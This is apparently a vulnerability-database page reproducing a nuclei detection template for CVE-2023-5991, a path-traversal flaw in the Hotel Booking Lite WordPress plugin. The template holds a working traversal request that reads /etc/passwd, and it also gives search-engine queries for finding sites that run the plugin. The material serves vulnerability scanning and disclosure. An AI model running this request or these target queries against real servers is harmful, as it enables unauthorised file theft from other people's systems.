Lucene search
K

Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 50 Views

Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion, allows unauthenticated users to download and delete arbitrary files on the serve

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-5991
26 Dec 202320:26
circl
CNNVD
WordPress plugin Hotel Booking Lite security vulnerability
26 Dec 202300:00
cnnvd
CVE
CVE-2023-5991
26 Dec 202318:33
cve
Cvelist
CVE-2023-5991 Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion
26 Dec 202318:33
cvelist
NVD
CVE-2023-5991
26 Dec 202319:15
nvd
OSV
CVE-2023-5991
26 Dec 202319:15
osv
Prion
Design/Logic Flaw
26 Dec 202319:15
prion
Positive Technologies
PT-2023-32464 · WordPress · Hotel Booking Lite
26 Dec 202300:00
ptsecurity
RedhatCVE
CVE-2023-5991
23 May 202505:08
redhatcve
wpexploit
Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion
1 Dec 202300:00
wpexploit
Rows per page
id: CVE-2023-5991

info:
  name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
  author: s4e-io
  severity: critical
  description: |
    The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
  impact: |
    Unauthenticated attackers can exploit missing validation and authorization checks to download and delete arbitrary files on WordPress servers running Hotel Booking Lite.
  remediation: Fixed in 4.8.5
  reference:
    - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5991
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5991
    cwe-id: CWE-22
    epss-score: 0.03313
    epss-percentile: 0.87085
    cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: motopress
    product: hotel_booking_lite
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking
    fofa-query: body=/wp-content/plugins/motopress-hotel-booking
    publicwww-query: "/wp-content/plugins/motopress-hotel-booking"
  tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "filename="
          - "/etc/passwd"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008d4856ff07baa6e3ffe724955f3ab8a5b9ab21d7a25faccb5eaac8bef0bbc68202202e96da366fc1bc24b9152198e00e3e38844c64c12556325ad241c9b2b8a612d3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.03313
50